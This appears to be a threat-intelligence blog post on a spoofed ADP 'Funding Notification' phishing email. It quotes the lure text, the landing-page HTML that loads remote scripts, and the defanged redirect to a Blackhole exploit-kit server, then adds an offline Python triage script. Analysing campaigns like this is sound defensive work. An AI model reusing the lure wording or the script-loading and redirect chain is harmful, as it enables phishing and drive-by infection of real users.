Emails with Subject "ADP Funding Notification – Debit Draft" lead to Exploits


Researchers at MX Lab have intercepted emails with the subject "ADP Funding Notification – Debit Draft" that lead to a malicious web site serving obfuscated JavaScript.


The email is sent from the spoofed address "ADP_FSA_Services@ADP.com" or "ADPClientServices@adp.com" and has the following body:


Your Transaction Report(s) have been uploaded to the web site:

https://www.flexdirect.adp.com/client/login.aspx

Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).

Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.

Thank You,

ADP Benefit Services

The link text shows an adp.com address, but the underlying URL does not lead there; it leads to hxxp://www.avrakougioumtzi.gr/PQB6j3HW/index.html, which serves the following HTML:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="hxxp://firmowa.malopolska.pl/WVfNMNHn/js.js"></script>
<script type="text/javascript" src="hxxp://humas.poltek-malang.ac.id/w28K6pb6/js.js"></script>

</html>

Both embedded JavaScript files redirect the browser to the same address with document.location='hxxp://173.255.228.171/getfile.php?u=853fda24'; the page at that address contains the obfuscated JavaScript.

After de-obfuscating the JavaScript, I found a Blackhole exploit pack landing page that tries to exploit one of several vulnerable client components (Flash, PDF readers and others). At the bottom of the page is the applet code that targets the Java AtomicReferenceArray vulnerability.
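The whole chain above (lure link whose visible text and href disagree, landing page pulling two remote scripts, each script redirecting with document.location) can be triaged offline from captured artifacts. The following Python script is an added example, not code from the original post or from MX Lab. The e-mail HTML snippet and the two script bodies are constructed to mirror what the post quotes, the URLs stay defanged (hxxp) so nothing is fetched from the network, and the function names are my own.

```python
"""Offline triage of a lure e-mail and its redirect chain.

Added example, not code from the original post. The e-mail body and the
JavaScript bodies below are constructed to mirror the post; URLs are kept
defanged (hxxp) so no network request is ever made.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


def host_of(url):
    """Return the host of a URL, accepting hxxp/hxxps defanging."""
    return urlparse(url.replace("hxxp", "http", 1)).hostname or ""


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs and external <script src> values."""

    def __init__(self):
        super().__init__()
        self.links = []      # list of [href, visible text]
        self.scripts = []    # src attribute of each external <script>
        self._in_anchor = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self._in_anchor = True
            self.links.append([a["href"], ""])
        elif tag == "script" and a.get("src"):
            self.scripts.append(a["src"])

    def handle_data(self, data):
        if self._in_anchor and self.links:
            self.links[-1][1] += data.strip()

    def handle_endtag(self, tag):
        if tag == "a":
            self._in_anchor = False


def mismatched_links(email_html):
    """Return (shown_url, real_href) for links whose visible text is a URL
    on a different host than the href. This is the lure pattern in the ADP
    mail: the text shows adp.com, the href points elsewhere."""
    p = LinkCollector()
    p.feed(email_html)
    return [
        (text, href)
        for href, text in p.links
        if re.match(r"(?i)h(x|t)tps?://", text) and host_of(text) != host_of(href)
    ]


# Matches document.location = '...', window.location.href = "..." etc.
_REDIRECT = re.compile(
    r"""(?:document|window)\.location(?:\.href)?\s*=\s*['"]([^'"]+)['"]"""
)


def redirect_target(js_source):
    """Extract the URL assigned to document/window.location, or None."""
    m = _REDIRECT.search(js_source)
    return m.group(1) if m else None


def follow_chain(landing_html, fetch):
    """Build the hop list: each remote script of the landing page and the
    redirect it issues. `fetch` maps a URL to its body; here it is a dict
    lookup over constructed samples so the example runs offline."""
    p = LinkCollector()
    p.feed(landing_html)
    return [(src, redirect_target(fetch(src))) for src in p.scripts]


# --- constructed samples mirroring the post (assumed, not captured here) ---
EMAIL_HTML = (
    '<p>Your Transaction Report(s) have been uploaded to the web site:</p>'
    '<a href="hxxp://www.avrakougioumtzi.gr/PQB6j3HW/index.html">'
    'https://www.flexdirect.adp.com/client/login.aspx</a>'
)

LANDING_HTML = """<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="hxxp://firmowa.malopolska.pl/WVfNMNHn/js.js"></script>
<script type="text/javascript" src="hxxp://humas.poltek-malang.ac.id/w28K6pb6/js.js"></script>
</html>"""

# Assumed: each script body contains only the redirect quoted in the post.
SCRIPT_BODIES = {
    "hxxp://firmowa.malopolska.pl/WVfNMNHn/js.js":
        "document.location='hxxp://173.255.228.171/getfile.php?u=853fda24';",
    "hxxp://humas.poltek-malang.ac.id/w28K6pb6/js.js":
        "document.location='hxxp://173.255.228.171/getfile.php?u=853fda24';",
}

if __name__ == "__main__":
    for shown, real in mismatched_links(EMAIL_HTML):
        print(f"lure: shows {shown} but points to {real}")
    for src, target in follow_chain(LANDING_HTML, SCRIPT_BODIES.__getitem__):
        print(f"{src} -> {target}")
```

The host comparison is deliberately exact rather than a suffix match, so a lure such as adp.com.example.net is still flagged; the redirect regex only catches the plain assignment form seen in this campaign, and an obfuscated second stage (like the getfile.php page) needs to be de-obfuscated before the same extractor applies.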

Labels: BlackHole Exploit, Spam Report